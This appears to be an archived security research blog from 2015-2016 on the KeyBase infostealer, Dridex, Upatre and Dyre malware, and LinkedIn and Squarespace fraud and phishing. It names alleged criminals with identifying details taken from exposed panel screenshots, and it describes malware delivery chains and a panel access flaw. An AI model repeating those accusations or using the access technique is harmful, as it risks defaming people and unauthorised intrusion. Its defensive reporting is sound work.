Please add me to your #Linkedin sockpuppet network!

Linkedin has approximately 414m active users of which, a part are completely fake. This practise has been observed in the past with fake recruiters targeting researchers. 

This content is the result of the same 'gang' of Nigerian criminals who favour KeyBase to steal sensitive credentials. I've observed these gangs (along with @techhelplist who finds a lot of the details included here) using Linkedin as a new platform to perform attempted financial fraud.

A large number of screenshots shared with me are as a the result of a misconfigured Keybase panel, there is a well known bug in Keybase which allows unauthenticated access to the /images/ directory to anyone who knows how to locate them. Palo Alto have listed a large number here

A percentage of determined sock puppets are using LinkedIn as a means at defrauding a significant number of business in following countries:

  • UAE
  • US
  • UK

Figures are created as a result of the companies targeted in the panel images

 

The sectors that are targeted include Real Estate, Investment & Law. This kind of fraud is complex in the sense it involves geographically displaced criminals to 'link up' to to be successful. The fraud is highly likely comitted from Nigeria (Thanks to @techhelplist again who helped ID the content and fraud gang) the concept is simple - Offering investment or seeking investment depending on the potential victim.

The belief that this  fraudulent operation is from Nigeria is because of the evidence provided, this included active Facebook content and helpful photographs of places of work, and friends associated with the gang.

This below image is taken from a panel which shows our 'guy' logged into a Linkedin profile, and a large number of messages all with the same content.

Seeking investment or offering investment.

@malwarehunterteam do a great job on supplying a large number of samples to various malware, iSpy came to my attention recently and the codebase is almost identical to KeyBase with both employing the same stealing functions. I will post a more detailed article on iSpy when i get time.

Reconnaissance message

We offer secured loand or funds to individuals and companies at low interest rates. we offer long and short terms loans or funding of any projects. Our firm has a recored a lot of breakthroughs in the provision of first-class financial services to our clients.
— Akeem

The message above is pretty static and appears to be sent to a large number of potential victims. The method of communication varies across email providers, if you believe you've been approached by this gang, or have been part of the attempted fraud process please contact me, i can share a number of verified IOC's.

The below image is a cap from the /images/ directory which includes a conversation with the 'master' who shares the devices used to perform the initial reconnaissance. Pg.5 on this alludes to the hierarchy involved

In summary, this concept of attempted fraud by social networks should sufficiently deliver a message that nobody is who you believe they are, particularly when dealing with financial transactions.

FireEye produced a research article on the thriving economy on 'scammers' operating out of Nigeria.  Pg.11 is of interest in the context of the content here.

The scammers use a variety of tools for distributing these exploits
and keyloggers, such as email extractors, email notifiers, bulk
mailing providers, and VPN/proxy providers. The email extractors
help scammers scrape email addresses of potential targets from
various sites which are fed to bulk mailing applications. They use
proxy providers as a precaution when logging into their victims’
accounts to hide their IP addresses. They also use email notifiers
to monitor incoming emails.
— https://www2.fireeye.com/rs/848-DID-242/images/rpt_nigerian-scammers.pdf

Trust, but verify is a mantra that i preach. It's dissapointing that Linkedin does not have any method of formal verification for its users. There is no PGP or Keybase.io input required, even most DNM require some form of ID verification!

@thegrugq makes the point far more eloquently that i ever could. In short, the game of cyber security has changed, and the content in which you operate or call your working environment, is someone else's lunch.

Full slides here

'only crime on this host'

There is some interesting aspects to research, one is being able to understand and analyse how criminals operate. Another is seeing how other researchers operate. 

Recently there has been a number of incidents that have involved what has been described as 'white hackers', i don't have a term which sufficiently describes the work other than, 'interesting'.

Who IS the Batman?

Last month, i noted that someone had replaced the malicious content usually delivered by Dridex with Avira and a ' calling card'. The calling card gave information as the content on the compromised server, and the intelligence which i believe was to identify the original owner or the original compromiser of the site

I've again been collating the intel behind this  person, or team who are quickly compromising the hosts after its been compromised and listing the details relating to the original compromise.

Following up to now? Good!

Legit site --> compromised ---> compromised again and details posted to identify the original actor.

Recently, a recently compromised site on hxxp://www.wakeupforpeace.org.au/crimeware-server-readme.txt-> Freezepage link http://www.freezepage.com/1456771380KTQSEGLOJB

Has been 'done' by what could be same actors/team previously observed in the Dridex 'incident', i may well be wrong but the details are strikingly similar.

 

The site itself is a simple phisher, looking for PayPay/banking credentials and some really bad .php handles the theft.

If anything this should teach you

  1. Do not use your own name for email address if you're going to use to receive the proceeds of crime.
  2. Do not log into your phishing site from your residential address 
  3. Also, do not include your personal email address in the POST of a transaction of a HTTP request.

Thanks again to https://twitter.com/Techhelplistcom/

#KeyBase reloaded

KeyBase first came to my attention in mid 2015, a favoured tool of those with little technical capability, and those known as ' skidz'.  I first wrote about in July 2015, noting some of the basic capabilities here http://www.brycampbell.co.uk/new-blog/2015/7/14/keybase-malware

Palo Alto have recently produced excellent research together with IOC's which go in to great detail, you should read it. http://researchcenter.paloaltonetworks.com/2016/02/keybase-threat-grows-despite-public-takedown-a-picture-is-worth-a-thousand-words/

In essence it steals sensitive credentials, here is some of the PHP used to steal the data:

 

 

A lot of thanks should go to the great work that @malwarehunterteam, @James_MHT and @Techhelplist are doing to promote the discovery and takedowns of these panels. I have privately and legally, observed some of the content that is being stolen by the criminals and it's extremely sensitive material.

Welcome to KeyBase

KeyBase, as mentioned is a infostealer, and the Palo Alto write up discusses its capabilities in much greater detail than i will.

KeyBase arrives by spoofed mails, often as disguised as office documents, or with double extensions, here is an example.

Cynomix relationship values

Hash & sample available here -  courtesy of Invincea

So, the research and analysis went on, the content became richer.Researchers in certain circles are critically aware of a known bug in KeyBase and further bugs add to the information being less than secure, this is highlighted in the Palo Alto article, and all information is secured was done so legally.

The comical aspect which prompted this post was the fact that KeyBase itself is not advanced, it is very noisy, it does not encrypt data in network communications, perimeter security will detect its patterns as it attempts to exfiltrate any sensitive information demonstrated by the image above with 'Window title' in the packet.

The panels themselves are usually not configured correctly, they are almost 'plug and play', and this is confirmed by the research done by Palo Alto, the screenshots below are all taken from a panel which was completely unsecured and available to view on the open web.

We quickly discovered that the 'miscreants' behind these panels had infected themselves, the reason for this is clear. The interesting screenshots including Facebook profiles, and messages between the gangs.

Screen Shot 2016-02-26 at 23.48.45.png

So, critically. You'll note i have not obscured any content. Joseph Ikems - we've extracted content which was captured from his own panel, or the friend he's discussing the 'problems with the panel' with.

However, it's probably more likely it was jeffjeff, as the panel was closely named to this in terms of domain registration. The reasons for this are shown in part by the content below.

We have email. So, we've managed, or should i say he has given us his email. The above screenshot shows the miscreant logged into a yahoo mail account under the name ' dixion.tony', lets assume its [email protected]

The most advanced threat intelligence platform in the world agrees, this is potentially our guy, he has history and people are complaining about being scammed.

This begun to get interesting as the exposed screenshots yielded more information, this time as the criminals begun to actively target industries, setting up fake domains and fake businesses in an attempt to extort legitimate businesses once they had been compromised.

A tab open 'Textile companies turkey'

The targets included in the spam campaigns had been crafted to appear from a fake company as shown below, 'Jinatrading LLC'

Jinatrading LLc

Looks to be having some 'issues'.

Website content

As the content begun to become more peculiar so did the screenshots captured from the panel. At one point Tony decided to log into Facebook.

Ehhh..Tony!

The total number of screenshots from Tony's own machines exceed 90, and the total of screenshots is over 200. Attempting to alert the victims proved fruitless sadly, a lot of them never responded. 

The lessons learned, and not published here are that the criminals behind this enterprise persisted to infect themselves with their own stealer, and fail to understand the technology they worked with, the details here are approximately 20% of what was extracted, including fake company registrations to appear legitimate.

An aggressive financial motive was clear, and some element of muling was involved. The screenshots below show searches for how to clear money or 'cash out'.

How do i hide my stolen money breh?

Detailed IOCs are available upon request, some of the artefacts are available to search via Hash and are listed on VT.

  1. https://www.virustotal.com/it/file/b900930b35d27208fd93f17a6c66ade96e6ecf9de4d6dc0c812b1dbca6746ff2/analysis/
  2. https://www.virustotal.com/it/file/77f6b395d65e869244cb526a17bda4cecf9220bcf4a7f47b898515f8e9b08c24/analysis/
  3. https://www.virustotal.com/it/file/e236ff3b1a65d42a11e74ebdaadc872f4d2b6e7aa2ee43b29cf123badc3d3e1b/analysis/
  4. https://www.virustotal.com/it/file/10eb146208f656b2f417a704b227f50cbf3eec67be67006db5dcc4a96228da32/analysis/
  5. https://www.virustotal.com/it/file/442f0e588d6270459914749e50d39d2feeec2d114e0ef357c57cb784fd9852f0/analysis/
  6. https://www.virustotal.com/it/file/a7230146b45eb9bb5940df9d9f65e63fc650c2afb3fc8502c5ded16c7f625b2a/analysis/
  7. https://www.virustotal.com/it/file/ba12cf6d096727e21a8de6202f05bba6c1917a1c638b59359130c0fe049d1c23/analysis/
  8. https://www.virustotal.com/it/file/780b005dbf3b24f1983fc36da125313a302bc787b77827d1eb9b2d347bed5439/analysis/
  9. https://www.virustotal.com/it/file/d48dd0b45639d1bd51db72e1adc5cbed344f31c6ce309874c4bc426ac59785e0/analysis/
  10. https://www.virustotal.com/it/file/87dd00b45358dc3ae3a4df65107601740aa24ce794bdf9e496dd79cf2606fc0b/analysis/

#Dridex gets an upgrade [Update]

Proofpoint and Phishme.com both confirm new developments

Since the beginning of the year Dridex has returned with an number of new features

  • New botnet ID's targeting Germany

  • New persistence methods, including writing to start folders at shutdown

  • Increased CPU usage when executing(!) 

  • AV targeting and debugger checks

A few samples i've analysed over the past few weeks have exhibited new capabilities, at least in terms of the delivery method and 'on disk' activity. 'Macroseses' as they are referred to in the current campaign mechanisms still prompt the user to enable macros, and still use a AutoOpen mechanism to extract and run. The current delivery is as follows.

MWI>Doc>Macro>Javascript>download over HTTP a .jpg > extract binary and finally execute in %appdata%

The developers appear to be experimenting with new capabilities, the malware i've observed recently appears to be using some rudimentary steganography.

Along with payload development the content is undergoing some active anti reversing tricks using debugger checks which will stop execution if a debugger is detected which i have not personally observed being used by Dridex this year.

Dridex is actively looking to avoid detection and will return an exit to the process if it detects a debugger attached to it. Further advances to the payload include Antivirus checks which in this particular payload had checks for Comodo Security suite.

I also observed some odd behavior in relation to what is being described as 'white hat' activity, by mainstream media. One payload was benign and delivered Avira Antivirus in the way i described above.

Some of the compromised sites hosting the Avira payload had what appeared to be a calling card left as a warning with cryptic messages relating to 'owner' or 'pwner?' and the host.

 

The final observations are the worrying strings associated with the detection of virtualization.

Observed API calls

  • Lower 163bcc30 BusVMware
  • GetSystemTimeAsFileTime
  • GetProcessHeap
  • MountPointManager
  • FindResourceA
  • GetTickCount
  • Sleep
  • GetStartupInfoA
  • TerminateProcess
  • UnhandledExceptionFilter
  • IsDebuggerPresent
  • LockResource
  • FindWindowExA
  • FindWindowA
  • RegOpenKeyExW
  • OpenProcessToken
  • GetUserNameW

#Dridex New year New tricks

Nope, it doesn't use 'DNS' changing as mentioned by some this week. Maybe a little confusion with the webinjects.

 

It has however changed slightly for persistence in the fact it now uses the startup folder to copy the loader into.

Squarespace spoof campaigns

Recently received a few well disguised emails pretending to be from my hosting company Squarespace. Seems like simple credential harvesting, no payloads on the sites.

Fake

Interestingly, i have received two in the past week, one a lot more professional than the previous.

Second mail

 

List of sites used.

Interested to hear from anyone who have received similar mails

 

 

 

 

Windows essential logging guides

Windows logging is absoloutly critical, and the brilliant work from dfir-blog.com shows in great detail how to fine tune it.


  • Use this - http://dfir-blog.com/2015/10/11/protecting-windows-networks-essential-logging/
  • In conjunction with this - https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/56016bffe4b0a6f05d1832ab/1442933759511/Windows+Logging+Cheat+Sheet_Sept_2015.pdf

Thanks to dfir-blog.com & MalwareArchaeology.com

#Dridex and the new Botnet ID

Read More

#Upatre & 'RSA encrypted' documents

Upatre has an identity crisis, it thinks it's an RSA encrypted document.

RSA?

Arriving in the form of seemingly 'signed' RSA document and branded with the RSA logo, this very clever change of tactic from the team behind the Upatre/Dyre campaigns have attempted to use what would probably fool the most observant of people.

The junk displayed isn't an RSA key, its just part of a macro which is part of the TTP associated with this particular campaign, whilst it's not a new style. It's certainly very clever.

The strings are visible with the fake key being shown here.

The Dyre/Upatre combination is something that has been used & abused by the same threat actors for sometime, this change of tactic by moving on from the regular spam such as invoices and remittance advice, to something which has a genuine attempt at obscuring its payload shows the constant development that Upatre is undergoing.

Here are some of the proxies in use by the botnet

https:

@techhelplist has been doing some work on identifying these routers and has a tracker on his site

Also, Proofpoint have identified this change.

 

 

 

 

 

The morals associated with hacking & breaches

Hacking, by definition is as follows. Thanks to Wikipedia

In the computer security context, a hacker is someone who seeks and exploits weaknesses in a computer system or computer network. Hackers may be motivated by a multitude of reasons, such as profit, protest, challenge, enjoyment
— https://en.wikipedia.org/wiki/Hacker_(computer_security)

HackingTeam had some questionable ethics in relation to business practises and had been long been pursued by those who sought to confirm this, One such being Christopher Soghoian who has relentlessly used his ability to raise the profile for the benefit of those being exploited by such as Hacking Team, VUPEN & Gamma.

The Gamma breach could be argued to be the start of the identifying characteristics of known 'corporate enemies' particularly those who provide EaaS or Exploitation as a Service. 

The interesting aspect of the Gamma breach was the breach was not met with a fanfare of expectation, much like Lizard Squad or Anonymous & LulzSec indirectly looked to gain notoriety with their actions, the only thing that brokered opinions on Gamma was their business dealings.

Soghoian commented in his PHD document on the approach that has become routine practise.

Assisting Big Brother has become a routine part of business, albeit one that some service providers would probably rather do without

Whilst the argument for Government surveillance is a long, and now more popular discussion amongst those who where none the wiser prior to the hacks, the leaks and breaches, it does indicate that its in the public interests to at least have a mandate on these discussions.

HackingTeam had been on the radar of privacy advocates for sometime, and had been highlighted as dealings with oppressive regimes numerous times. The claim was vindicated by news once HT had been breached and the data appeared online with numerous conversations with those regimes had been confirmed.

 https://twitter.com/ClausHoumann/status/649487453502488577/photo/1

https://twitter.com/ClausHoumann/status/649487453502488577/photo/1

The connection between breaches and hacks is a distinction that probably needs to be made clearer. If, given the motivation of a hacker can be left to the conclusion of the victim. It's always going to be malicious. If in the case of a company that chooses to sell 0day exploits in order to perform genocide, then its a hack, the opposite can be said if a company chooses to portray a political leader in a comical light, therefore offending a nation. It's a breach.

Enemies are listed here very helpfully in order to form an opinion.

  • Gamma International - Hacked
  • HackingTeam - Hacked
  • BlueCoat 
  • Trovicor
  • AmeSys

 Questionable business practises lead to breaches, questionable moral practises lead to hacks.

 

 

Honey, i shrunk the profits.

Updated 05/09/15 with screenshot from @conradlongmore

 

A business is only as strong as the capabilities that protect it, not only in a strategic or a governance manner but in a theoretical capacity. 

Ubiqiti had $46m siphoned out of their accounts by way of a phishing email, this was disclosed on the SEC filings & this demonstrates the levels of losses that face a business as a result of phishing.

I spend a lot of my time tracking phishing campaigns and the associated botnets that make money, real money from the fraudulent transactions that occur as a result of phishing campaigns. Often, mail campaigns arrive in the 10's of thousands to unsuspecting recipients & that threat is growing greater.

  • Do you have the ability to received unsolicited emails from spammers? Does your hardware capacity planning include daily spam campaigns?
  • Do you as a  spoofed sender have the ability to take hundreds of disgrunted phone calls (See below from @Conradlongmore) and unparalleled traffic to your site wondering why 'you' are sending emails asking for payment, or whatever SE technique is being used to deliver the mails.

 

 

 

  • Are you customers and employees familiar with the disclosure of losses and third party information that may be disclosed as a result of one of your employees opening a phishing email?
  • Can you cope financially with the fraudulent transactions that may occur as a result of these campaigns?

If you're unable to answer all of these questions with a firm, 'Yes', i would show a great deal of concern in identifying the areas which your business is exposed to. If you have any capabilities for payment processing or receiving payments then the risk of being phished is as great as ever.

$46m, think about that figure and consider if in relative terms you can afford that level of losses.

#Dridex doesn't appreciate your research

This time targeting researchers using TOR for anonymous research, i don't think its in the interests of these actors to destroy the victims drives unless they are a target. Its an assumption that only those using TOR for inspection of Dridex campaigns are being targeted.

I noticed when analysing a recent sample, on Window XP that it destroyed the MBR and this seems to tally up with Lexsi research and the comments on Malekai's forum.

With the significant growth into Europe, Spain & France particularly being affected, this menace proves its capabilities with a sting in its tail.

Dridex code analysis



Keybase Malware

I have recently analysed a sample of what appears to be a newer version of Keybase

Having been delivered as an executable inside a zip, the malware has the usual key logging capabilities as most trojans, utilising native API calls to hook keyboard processes and using HTTP to upload images of the desktop, the victims in this instance are being uploaded to a server which isn't as tightly managed as usual.

Here is the web panel 

Panel

Here are the uploaded screenshots, appended with date and times.

Uploads

Here are some screenshots of applications in use on the victims machines.

Skype

Someone about to do some online banking, which will capture keystrokes as well as the capability to take screenshots.

Banking

Someone placing an order for some materials via Outlook.com

Materials

We can see encoded in the HTTP stream the inclusions of specific keywords including, notepad which i launched and keystrokes included in the request to the C&C uploading the screenshots.

Traffic


#Dridex leverages known CVE's

Recent analysis of a Dridex sample has evidence of two hard coded references to CVE's below the elevation code for .sdb abuse.

 

Internal code references to two known RCE vulnerabilities in Windows.

Probably another method of bypassing UAC now that Microsoft patched the .sdb abuse method first noticed in February and noted by CERT-JP

Update : Compromised AirOS Routers being used by #Dyre

Updated to include comments from Ubiquti.

Dyre/Dyreza has gotten some attention this week in relation to targeting banks, after tracking Dridex and other associated banking Trojans I've researched parts of the command and control infrastructure that is abused by Dyre/Dyreza. 

Dridex uses compromised sites for payload delivery, Upatre & Emotet do similar things, Dyre/Dyreza are using compromised routers.

I analysed Dyre/Dyreza samples upon infection are seeking to communicate with with a lot of compromised AirOS router's within the botnet.

Dyre

Not only AirOS is affected by Dyre/Dyreza.

RouterOS MicroTiK

Recently, i recall reading on Krebs blog, that Lizard squads DDOS platform ran via using backdoors on compromised routers. If this vector is using brutceforcing of potentially weak usernames and passwords in the same way Lizard squad did, or via a backdoor that ships with the routers for firmware upgrades remains to be seen.

Update 8/7/15

Comments from Brian Krebs here

Ubiquti gave the following statement

We did disable remote management by default, and took a lot of flack from our users, so we reverted it.

You should inform the ISP about this router, so they can contact the user.
— http://community.ubnt.com/t5/Installation-Troubleshooting/Attack-Malware/m-p/1289182#M83622

Admitting it previously shipped with RM disabled and then enabling it as a result of feedback seems strange. The threat it poses far outweighs the benefits of enabling it.

#Dridex reaches full SSL capability

Dridex today reached full SSL capabilities for the communication to the  'Supernodes', a few samples analysed today showed pure SSL traffic connectivity to peer nodes in the botnet, this was something that I feared was evolving considering the active checking of modern sandbox analysis, today this gives Dridex the ability to hide in SSL traffic &  the threat posed by this is three fold

  1. SSL traffic is a legal, and political minefield, SSL interception even more.
  2. Companies at risk of spam campaigns are obligated to identify, and mitigate the traffic giving credence to the risk it poses, research can't be done without intercepting SSL traffic. 
  3. Smaller companies who do not possess the financial, legal or technical abilities to intercept SSL traffic will not be able to cope with the already advanced threat.

Dridex campaigns are also spreading further into the EU with CERT FR today posting an alert in relation to the campaigns actively targeting France

Dridex Botnet 220, 125 & 120 are now the number one risk posed to businesses that use email as means of communications, the success rates and high turnover in terms of IP infrastructure associated with Dridex make it clear that it's successful tool for criminals.

Whilst everything is being done to monitor backdoors, these threats are coming in through the front door.

 

 

#Dridex & Anti Virtualisation detection

Dridex seems to be the most prevalent form of Malware targeting businesses, since the turn of the year i've thrown some numbers around about how Dridex is 

  • Targeting the UK Retail & Finance industry
  • Evolved using PowerShell (Platform dependant)
  • Uses rudimentary encryption (ROT13) to attempt to avoid analysis

A newer twist to Dridex is the ability to attempt to circumnavigate some commercial virtualisation. Here is a snippet from one of the samples freely available on Malwr.com or via the excellent hybrid-analysis.com

Screen Shot 2015-03-14 at 10.29.41.png

I could see once the sample was detonated it would drop %temp% files and in the temp files are the configuration details for the sample its currently detonating, it is explicitly attempting to detonate on 'tin', for lack of a better phrase. Didier had encountered this sample, and came to the same conclusion as me. 

I prefer to inspect the malicious word document via python scripts than to detonate it in a sandbox.

I again refer to the excellent BotConf i attended in December and  talk from Paul Jung discussing sandbox detection

When inspecting the malicious documents i highly recommend http://www.decalage.info/ an the olevba.py scripts which can not only dump the macro and read encoded base64 strings, but will prettify the content into tables for 'reporting'.

Screen Shot 2015-03-14 at 10.57.45.png